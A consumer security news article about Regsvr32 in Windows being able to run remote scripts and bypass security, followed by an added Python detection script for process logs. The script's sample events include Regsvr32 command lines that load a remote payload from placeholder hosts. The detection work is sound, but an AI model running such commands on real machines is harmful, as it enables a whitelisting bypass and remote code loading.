
Security Alert: Core Windows feature gives hackers a way into your computer


There's no such thing as perfect security. A clever person or group can always find a way through or around obstacles to reach a goal. We're learning that again thanks to a security researcher who found a potentially dangerous feature buried deep in Windows.

This feature could let a hacker install malicious programs without administrator privileges or much chance of being stopped. It isn't clear when, if, or how Microsoft can patch this problem, and here's why.

The source of the problem is a core Windows program called Regsvr32, or Windows Registry Server, which links DLLs, or library files, with the Windows Registry. It's a critical part of Windows, but it has a hidden feature no one realized.

What the security researcher found is that Regsvr32 can be used to run JavaScript or VBScript that lives on a remote server. With a single command, a hacker can start a major attack against your computer.

Even worse, because of the way Regsvr32 works, it bypasses a lot of Windows' built-in security. In this case, this attack even bypasses Regsvr32's normal security against running things that can change the computer.

There is some good news, however. According to the security researcher, this works only if a hacker has physical access to the computer. It's also only the first stage of an attack that requires the smarts of a skilled hacker to do actual damage.

While this is going to be a big concern for big companies with lots of computers and employees, individual users aren't in much danger. It's always possible a hacker will figure out a way to take advantage of this remotely, but they would still need to trick you into downloading and running a program first.
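For the companies with lots of computers mentioned above, here is one way to look for this behavior in process-creation logs. It is an added example, not code from the original article or the researcher: it flags any Regsvr32 launch whose arguments point at a URL or a network share. The event records, host names and `example.dll` are constructed placeholders.

```python
import ntpath
import re

# Constructed sample process-creation records: (image path, command line).
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\regsvr32.exe",
     r"regsvr32.exe /s C:\Windows\System32\msxml3.dll"),
    (r"C:\Windows\System32\regsvr32.exe",
     r"regsvr32 /s /i:https://files.example.invalid/payload example.dll"),
    (r"C:\Windows\SysWOW64\REGSVR32.EXE",
     r'"C:\Windows\SysWOW64\REGSVR32.EXE" -i:\\fileserver.example.invalid\share\payload example.dll'),
    (r"C:\Program Files\Browser\browser.exe",
     r"browser.exe https://www.example.invalid/"),
]

TOKEN = re.compile(r'"[^"]*"|\S+')            # quoted string or bare word
OPTION = re.compile(r'^[/-][A-Za-z]+:(.*)$')  # switch carrying a value, e.g. /i:VALUE
REMOTE = re.compile(r'^(?:(?:https?|ftp)://|\\\\[^\\]+\\)', re.I)  # URL or UNC path


def remote_arguments(command_line):
    """Return the argument values that point at a URL or a UNC share."""
    hits = []
    for token in TOKEN.findall(command_line)[1:]:  # skip the program name
        value = token.strip('"')
        match = OPTION.match(value)
        if match:                                  # look inside /x:VALUE switches
            value = match.group(1).strip('"')
        if REMOTE.match(value):
            hits.append(value)
    return hits


def flag_events(events):
    """Return (image, remote_values) for Regsvr32 launches that reference a remote location."""
    flagged = []
    for image, command_line in events:
        if ntpath.basename(image).lower() != "regsvr32.exe":
            continue                               # other programs are out of scope
        hits = remote_arguments(command_line)
        if hits:
            flagged.append((image, hits))
    return flagged


if __name__ == "__main__":
    for image, hits in flag_events(SAMPLE_EVENTS):
        print("ALERT:", image, "->", ", ".join(hits))
```

Registering a local DLL, the normal use of Regsvr32, is not flagged, and neither is a browser opening a URL.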

As always, a good way to stay safe from most online threats is to avoid links and attachments in unsolicited or suspicious email. You should also change your account settings from administrator to standard, which keeps programs from installing without your permission.

Will Microsoft update Regsvr32 to minimize this risk? It depends on whether it thinks the risk of this type of attack outweighs changing a vital part of Windows and potentially breaking a lot of computers.

In either case, keep reading our Happening Now section for updates on this and other security risks. We'll also tell you when Microsoft releases new patches and how you can get them.

Source: Threat Post